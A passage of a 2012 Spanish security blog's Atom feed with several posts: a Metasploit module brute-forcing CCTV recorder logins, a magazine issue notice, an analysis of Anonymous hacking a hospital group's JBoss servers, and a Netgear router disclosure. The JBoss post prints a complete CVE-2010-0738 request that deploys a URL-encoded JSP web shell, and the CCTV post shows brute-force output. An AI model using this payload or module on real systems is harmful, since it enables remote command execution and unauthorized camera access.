rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8412165970090989764" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/hulk-una-herramienta-dos-para.html" title="HULK, una herramienta DoS para servidores web" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-eoLvdVqLqVg/T7UbUek4dPI/AAAAAAAAEs8/GGYohc-xS_8/s72-c/hulk.jpg" height="72" width="72" /><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-2563663996041145784</id><published>2012-05-16T13:50:00.001+02:00</published><updated>2012-05-16T13:51:26.738+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="exploits" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><title type="text">Hacking de sistemas CCTV con Metasploit</title><content type="html">&lt;a href="http://4.bp.blogspot.com/-99tJxfzk80o/T7OTNgZXlpI/AAAAAAAAEpo/3mZ6Sq6JtwA/s1600/cctv_sample.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/-x-xQ3xI9BLE/T7OTG0uLRMI/AAAAAAAAEpg/ZtY4qCY6SMg/s1600/cctv_assasin.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://2.bp.blogspot.com/-x-xQ3xI9BLE/T7OTG0uLRMI/AAAAAAAAEpg/ZtY4qCY6SMg/s200/cctv_assasin.jpg" width="200" /&gt;&lt;/a&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;Un nuevo módulo para el Framework de Metasploit, &lt;a href="http://metasploit.com/modules/auxiliary/scanner/misc/cctv_dvr_login" target="_blank"&gt;cctv_dvr_login&lt;/a&gt;, descubre y pone a prueba la seguridad de los &lt;b&gt;sistemas de vídeo vigilancia de los circuitos cerrados de televisión (CCTV)&lt;/b&gt;. Estos sistemas suelen utilizarse en pequeñas tiendas, comunidades de vecinos, residencias personales y entornos empresariales como parte de su programa de seguridad física. Sin embargo, muchos de estos sistemas son vulnerables y pueden permitir a un atacante obtener acceso remoto. Este acceso remoto, activado por defecto, puede permitir no sólo la posibilidad de ver vídeo en tiempo real, si no también el control de las cámaras (si es compatible) y facilitar el acceso a imágenes de archivo.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://4.bp.blogspot.com/-99tJxfzk80o/T7OTNgZXlpI/AAAAAAAAEpo/3mZ6Sq6JtwA/s1600/cctv_sample.png" style="clear: right; float: right; font-family: Verdana,sans-serif; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="208" src="http://4.bp.blogspot.com/-99tJxfzk80o/T7OTNgZXlpI/AAAAAAAAEpo/3mZ6Sq6JtwA/s320/cctv_sample.png" width="320" /&gt;&lt;/a&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;La mayoría de los propietarios de los sistemas de vigilancia de vídeo de CCTV pueden incluso no ser conscientes de las capacidades de su dispositivo, algunos de los cuales pueden estar expuestos a Internet, ya sea intencionalmente o por accidente. &lt;br /&gt;&lt;br /&gt;En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;pre class="prettyprint" style="font-family: Verdana,sans-serif; overflow: auto;"&gt;&lt;span style="font-size: small;"&gt;msf &amp;gt; use auxiliary/scanner/misc/cctv_dvr_login&lt;br /&gt;msf auxiliary(cctv_dvr_login) &amp;gt; set RHOSTS 10.10.1.14&lt;br /&gt;RHOSTS =&amp;gt; 10.10.1.14&lt;br /&gt;msf auxiliary(cctv_dvr_login) &amp;gt; exploit&lt;br /&gt;&lt;br /&gt;[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:’admin’ with password:”&lt;br /&gt;[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: ‘admin’&lt;br /&gt;[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:’user’ with password:”&lt;br /&gt;[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: ‘user’&lt;br /&gt;[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:’admin’ with password:’admin’&lt;br /&gt;[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: ‘admin’&lt;br /&gt;[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:’admin’ with password:’1111’&lt;br /&gt;[+] 10.10.1.14:5920 Successful login: ‘admin’ : ‘1111’&lt;br /&gt;[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80&lt;br /&gt;[*] Scanned 1 of 1 hosts (100% complete)&lt;br /&gt;[*] Auxiliary module execution completed &lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Más detalles técnicos en&amp;nbsp;&lt;/span&gt;&lt;a class="jive-link-external-small" href="http://blog.gdssecurity.com/labs/2012/5/15/using-metasploit-to-access-standalone-cctv-video-surveillanc.html"&gt;Gotham Digital Science Blog&lt;/a&gt;.&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: Verdana,sans-serif; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-99tJxfzk80o/T7OTNgZXlpI/AAAAAAAAEpo/3mZ6Sq6JtwA/s1600/cctv_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-nTec744OJwk/T7OUYg-mkUI/AAAAAAAAEpw/DD9l2PYTnc8/s1600/cctv_nation.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://1.bp.blogspot.com/-nTec744OJwk/T7OUYg-mkUI/AAAAAAAAEpw/DD9l2PYTnc8/s640/cctv_nation.jpg" width="464" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;CCTVs: &lt;a href="http://eripp.com/?ipdb=1&amp;amp;search=DVR+WebViewer&amp;amp;sort=time&amp;amp;order=DESC&amp;amp;limit=200&amp;amp;submitbutton=Search" target="_blank"&gt;http://eripp.com/?ipdb=1&amp;amp;search=DVR+WebViewer&amp;amp;sort=time&amp;amp;order=DESC&amp;amp;limit=200&amp;amp;submitbutton=Search &lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-2563663996041145784?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/2563663996041145784/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=2563663996041145784" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2563663996041145784" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2563663996041145784" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/hacking-de-sistemas-cctv-con-metasploit.html" title="Hacking de sistemas CCTV con Metasploit" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-x-xQ3xI9BLE/T7OTG0uLRMI/AAAAAAAAEpg/ZtY4qCY6SMg/s72-c/cctv_assasin.jpg" height="72" width="72" /><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-6442049690475770768</id><published>2012-05-16T10:21:00.002+02:00</published><updated>2012-05-16T10:21:22.783+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="magazines" /><title type="text">ClubHACK Magazine nº28</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qyCCe85X16U/T7Njaf_oFaI/AAAAAAAAEpU/2wDMRhrZwSM/s1600/clubhackmag28.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-qyCCe85X16U/T7Njaf_oFaI/AAAAAAAAEpU/2wDMRhrZwSM/s320/clubhackmag28.jpg" width="246" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Se ha publicado el número 28 (mayo 2012) de Clubhack Magazine. Este mes, la revista india incluye artículos que tratan asuntos tan interesantes como la esteganografía en covert channels, la herramienta Kautilya que facilita el uso de USB HID como Teensy++, el protocolo HTTPS, el robo de identidad y algunas pequeñas medidas para evitar la inyección en nuestro código.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Índice:&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;0x01 - Steganography over converted channels (Tech Gyan)&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;0x02 - Kauntilya (Tool Gyan)&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;0x03 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Gide)&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;0x04 - Section 66C - Punishment for identity theft (Legal Gyan)&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;0x05 - Don’t Get Injected – Fix Your Code (Code Gyan)&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;La versión PDF puede descargarse desde: &lt;a href="http://chmag.in/issue/may2012.pdf"&gt;http://chmag.in/issue/may2012.pdf&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-6442049690475770768?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/6442049690475770768/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=6442049690475770768" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/6442049690475770768" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/6442049690475770768" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/clubhack-magazine-n28.html" title="ClubHACK Magazine nº28" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-qyCCe85X16U/T7Njaf_oFaI/AAAAAAAAEpU/2wDMRhrZwSM/s72-c/clubhackmag28.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-2498108200170234375</id><published>2012-05-14T19:15:00.000+02:00</published><updated>2012-05-14T22:22:54.752+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="noticias" /><category scheme="http://www.blogger.com/atom/ns#" term="hacktivismo" /><category scheme="http://www.blogger.com/atom/ns#" term="pwned" /><title type="text">La 9ª de Anonymous compromete los sitios web de Capio Sanidad</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-jYn6Q1UaNNI/T7E-KELiwJI/AAAAAAAAEno/svauq5wF-Tg/s1600/capio_sanidad_pwned2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s1600/logo_capio_sanidad.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s1600/logo_capio_sanidad.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s1600/logo_capio_sanidad.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s1600/logo_capio_sanidad.png" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;La &lt;b&gt;9ª compañía&lt;/b&gt; ha publicado un &lt;a href="http://www.pastebay.net/957827" target="_blank"&gt;mensaje &lt;/a&gt;informando que han tomado &lt;i&gt;"el control de TODA su identidad online: Capio Sanidad, Capio Enfermería y, aun más grave, las webs de los Hospitales que gestiona, incluyendo citas online, analíticas, etc.".&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;El &lt;b&gt;grupo de Anonymous&lt;/b&gt; lleva a cabo esta acción contra la &lt;b&gt;privatización de la sanidad pública&lt;/b&gt; y particularmente en represalia contra &lt;b&gt;Capio Sanidad, que se llevará próximamente los hospitales públicos de Castilla La Mancha y Valencia.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&amp;nbsp;&lt;a href="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s1600/logo_capio_sanidad.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;&lt;a href="http://2.bp.blogspot.com/-jYn6Q1UaNNI/T7E-KELiwJI/AAAAAAAAEno/svauq5wF-Tg/s1600/capio_sanidad_pwned2.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="175" src="http://2.bp.blogspot.com/-jYn6Q1UaNNI/T7E-KELiwJI/AAAAAAAAEno/svauq5wF-Tg/s320/capio_sanidad_pwned2.png" width="320" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Si observamos con detalle el &lt;a href="http://youtu.be/Xedc-XubCyQ" target="_blank"&gt;vídeo&lt;/a&gt;, vemos que la web utilizaba un &lt;b&gt;servidor de aplicaciones Jboss desactualizado&lt;/b&gt; (4.2.3 GA) y la &lt;b&gt;consola JMX&lt;/b&gt; era accesible publicamente (www.capiosanidad.es/jmx-console/).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;La "demo" muestra como era posible apagar remotamente el servidor de aplicaciones, pero áun más interesante son las URLs que demuestran que se ha conseguido desplegar un webshell (/zecmd/zecmd.jsp).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Probablemente esto se consiguió a través del mbean DeploymentFileRepository y aprovechando la vulnerabilidad &lt;b&gt;CVE-2010-0738&lt;/b&gt;: la consola sólo aplica restricciones de seguridad para peticiones GET y POST, obviando otros métodos como HEAD.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Esto nos podría permitir desarrollar una petición para subir y desplegar un war malicioso, tal y como ya explotó masivamente el gusano Linda:&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;pre class="prettyprint" style="overflow: auto;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;$zecmd = "HEAD /jmx-console/HtmlAdaptor?&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;action=invokeOpByName&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;name=jboss.admin%3Aservice%3DDeploymentFileRepository&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;methodName=store&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;argType=java.lang.String&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;arg0=zecmd.war&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;argType=java.lang.String&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;arg1=zecmd&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;argType=java.lang.String&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;arg2=.jsp&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;argType=java.lang.String&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;argType=boolean&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;amp;arg4=True HTTP/1.0\r\n\r\n";&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span style="font-size: small;"&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Lamentable es la privatización de nuestra sanidad pública y lamentable es que no se destinen los recursos necesarios para proteger la seguridad de los sistemas informáticos que alojan los datos de miles de pacientes. &lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Recordemos que son datos de carácter personal de nivel alto (LOPD). ¿Se ha llevado a cabo la correspondiente auditoría?, ¿existe el conjunto de medidas de carácter técnico y organizativo que está obligado a implantar el responsable del fichero a fin de garantizar la seguridad de los equipos y sistemas informáticos?&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-2498108200170234375?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/2498108200170234375/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=2498108200170234375" title="8 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2498108200170234375" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2498108200170234375" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/la-9-de-anonymous-compromete-los-sitios.html" title="La 9ª de Anonymous compromete los sitios web de Capio Sanidad" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-FTeTmcu8OKI/T7FB2sQEz1I/AAAAAAAAEn8/UT8Iq6IiE6Q/s72-c/logo_capio_sanidad.png" height="72" width="72" /><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-3742260716775817219</id><published>2012-05-14T11:18:00.000+02:00</published><updated>2012-05-14T11:19:46.578+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="vulnerabilidades" /><title type="text">Exposicion de info sensible en routers Netgear WNDRMAC</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-efcWBG4aZZM/T7DLXmY5RbI/AAAAAAAAEnM/T5ZeZybqyaE/s1600/netgear_WNDRMAC.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-efcWBG4aZZM/T7DLXmY5RbI/AAAAAAAAEnM/T5ZeZybqyaE/s1600/netgear_WNDRMAC.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Nathaniel Carew de Sense of Security Labs ha reportado una &lt;a href="http://seclists.org/fulldisclosure/2012/May/104" target="_blank"&gt;vulnerabilidad&lt;/a&gt; en el &lt;b&gt;router NETGEAR Wireless Extreme (WNDRMAC) N600&lt;/b&gt;, el cual muestra información sensible en el código fuente de su interfaz web. Concretamente, si se ha configurado la &lt;b&gt;recuperación de contraseña&lt;/b&gt;, un atacante podría obtener las respuestas de las preguntas de seguridad y loggearse en el dispositivo.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Inicialmente, si fallamos al introducir el login del administrador, observamos si está activada la recuperación:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;iframe src="http://pastebin.com/embed_iframe.php?i=8LFh7EpK" style="border: medium none; width: 100%;"&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Y simplemente, en el cgi correspondiente, podemos ver las preguntas y las respuestas con las que podremos acceder al router con las credenciales de administración:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;iframe src="http://pastebin.com/embed_iframe.php?i=4TVtNayB" style="border: medium none; width: 100%;"&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Por el momento se recomienda desactivar la opción de recuperación de contraseñas.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-3742260716775817219?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/3742260716775817219/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" 